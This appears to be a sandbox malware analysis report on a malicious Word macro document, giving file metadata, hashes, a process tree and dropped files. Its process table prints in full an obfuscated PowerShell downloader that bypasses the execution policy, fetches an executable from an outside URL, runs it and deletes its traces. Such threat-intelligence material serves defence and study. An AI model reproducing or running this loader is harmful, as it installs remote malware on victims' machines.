File name: | e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e |
Full analysis: | https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 07:25:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia. |
MD5: | B3B1760D2E5525A562F2D7A49C27ED93 |
SHA1: | 94BE3E9B653FF9C2DB2FEA0A3FFB5F02E533D77E |
SHA256: | E32940C52AED3B787267F4B8D528AF97108B46F5254578CBAAB20768D98F589E |
SSDEEP: | 3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J |
.doc | | | Microsoft Word document (33.9) |
---|
Category: | sunt |
---|---|
Manager: | Hertha Scholtz B.A. |
Company: | Junck Matthäi OHG mbH |
Slides: | -2147483648 |
Notes: | -2147483648 |
Lines: | 6422 |
HiddenSlides: | -2147483648 |
Bytes: | -2147483648 |
Paragraphs: | 191 |
Comments: | Deserunt dolorem natus quae vel quia. |
Pages: | 64 |
Words: | 2331 |
TotalEditTime: | 2.0 minutes |
Title: | Dokument N892778 |
Template: | Normal |
Subject: | Dokument N892778 |
RevisionNumber: | 181519 |
LastModifiedBy: | Eduard Schuchhardt B.A. |
Keywords: | voluptate, earum, enim |
Security: | None |
ModifyDate: | 2018:10:01 23:48:18 |
CreateDate: | 2018:10:01 23:48:18 |
Characters: | 2331 |
Author: | Eduard Schuchhardt B.A. |
Software: | Microsoft Office Word |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
CompObjUserTypeLen: | 39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2372 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
1784 | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression ($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0); | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:C602DFE9823E722F2F602F33A37CBB13 | SHA256:B9F85015219CA33C2616875F9802DCEDE0301FBD50F4336F285FCB9712451DE2 | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:54EFE3C64894D8001451CFCADF9C0F3C | SHA256:52FBDDD19233ECC3F43CE229F6EA525C6775F435445E4811421195C40F8F569D | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNK | lnk | |
MD5:1646F6F20D0CFC75416A644F97532017 | SHA256:B32EBC7D5CF76DF0C0A167BEE162B7523FC4CF2FDDF30744486C5869F2072E60 | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
2372 | WINWORD.EXE | C:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc | pgc | |
MD5:ADEB6243CB5FAD24CF9D150EC6AA3E0D | SHA256:0B567364B7EA4A3E8846D6D723ECE32DD8D14C1CF9893AF84900686D538FF0FB | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txt | text | |
MD5:847B0C3A6010660492ECC1D88A69210D | SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B | |||
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txt | text | |
MD5:409ED6BE5314BAC97AFC88ACA11725A8 | SHA256:613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48 |